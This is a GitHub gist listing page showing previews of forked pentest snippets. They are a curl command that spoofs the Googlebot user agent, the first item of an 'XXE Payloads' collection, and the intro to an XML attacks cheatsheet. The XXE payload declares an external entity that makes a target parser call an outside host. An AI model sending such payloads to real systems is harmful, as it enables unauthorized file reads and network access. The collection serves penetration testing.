Skip to content

Instantly share code, notes, and snippets.

View calyeo's full-sized avatar

calyeo

View GitHub Profile
@calyeo
calyeo / gist:d504b2926c941f6e97cce4fcb7971719
Created July 4, 2022 12:57 — forked from chrisle/gist:2252209
CURL as GoogleBot 2.1
curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" -v $@
@calyeo
calyeo / XXE_payloads
Created July 4, 2022 12:56 — forked from mgeeky/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@calyeo
calyeo / xml-attacks.md
Created July 4, 2022 12:55 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.